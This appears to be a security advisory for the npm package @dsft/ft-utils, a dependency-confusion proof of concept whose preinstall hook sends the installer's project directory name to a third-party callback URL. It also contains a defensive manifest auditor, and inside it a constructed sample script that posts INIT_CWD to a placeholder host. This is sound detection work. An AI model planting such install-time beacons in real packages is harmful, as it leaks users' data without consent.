
MAL-2026-5890

Malicious code in @dsft/ft-utils (npm)

Details


## Source: amazon-inspector (a80ec07b8de5ed0e8cf43a8584075210d47e80e7bcc04368a5029f7637188db3)

The package is a dependency-confusion proof-of-concept squatting on the @dsft/ scope. Its package.json declares a preinstall hook that runs index.js, which reads the installer's INIT_CWD environment variable (the consumer's project directory), derives the project's basename, and POSTs it together with a package identifier and timestamp to a hardcoded third-party URL (https://deepbounty.dd06-dev.fr/cb/f9543624-20d8-465b-a026-d01872b93933). The package provides no library functionality matching its name; the install-time beacon is its sole behavior, and the package self-describes as a 'Security PoC for Bug Bounty.' Any `npm install` of this package automatically discloses the installing project's directory name and confirms the host's environment to the operator of the callback endpoint, without consent.
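A defender-side check for the behaviour described above, added here as an example and not code from the advisory or from the package itself: it parses a package manifest, lists install-time lifecycle hooks, and scans the script each hook invokes for the indicators the description names (INIT_CWD access, an outbound URL, a network call). The manifest and script it inspects are constructed samples; `@example-scope/sample-utils` and `callback.example.invalid` are placeholders.

```javascript
// Lifecycle scripts npm runs automatically during install.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Indicators of an install-time beacon, taken from the advisory's description.
const INDICATORS = [
  { name: "reads INIT_CWD", re: /process\.env\.INIT_CWD/ },
  { name: "hardcoded http(s) URL", re: /https?:\/\/[^\s"'`]+/ },
  { name: "network call", re: /\b(fetch|https?\.request|axios|got)\s*\(/ },
];

// Audit one manifest. readFile(path) returns the source of a script file or "".
function auditManifest(manifestJson, readFile) {
  const pkg = JSON.parse(manifestJson);
  const scripts = pkg.scripts || {};
  const installHooks = LIFECYCLE_HOOKS.filter((h) => typeof scripts[h] === "string");
  const findings = installHooks.map((hook) => {
    const command = scripts[hook];
    // Resolve "node index.js"-style commands to the file they execute.
    const m = command.match(/\bnode\s+([^\s&|;]+)/);
    const file = m ? m[1] : null;
    const src = file ? readFile(file) : "";
    const indicators = INDICATORS.filter((i) => i.re.test(src)).map((i) => i.name);
    return { hook, command, file, indicators };
  });
  // Two or more indicators in a script run at install time is worth a review.
  const suspicious = findings.some((f) => f.indicators.length >= 2);
  return { name: pkg.name, installHooks, findings, suspicious };
}

// Constructed sample mirroring the shape the advisory describes (placeholder names).
const SAMPLE_MANIFEST = JSON.stringify({
  name: "@example-scope/sample-utils",
  version: "0.0.1",
  scripts: { preinstall: "node index.js" },
});
const SAMPLE_FILES = {
  "index.js": [
    "const dir = process.env.INIT_CWD || process.cwd();",
    "const name = require('path').basename(dir);",
    "fetch('https://callback.example.invalid/cb', { method: 'POST', body: name });",
  ].join("\n"),
};

function auditSample() {
  return auditManifest(SAMPLE_MANIFEST, (f) => SAMPLE_FILES[f] || "");
}

console.log(JSON.stringify(auditSample(), null, 2));
```

Running the same function over every `node_modules/*/package.json` after an install, with a real file reader, surfaces which dependencies execute code at install time and which of those also touch the indicators above.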


Affected packages

npm / @dsft/ft-utils

No fixed version published yet for @dsft/ft-utils (npm). Pin to a known-safe version or switch to an alternative.
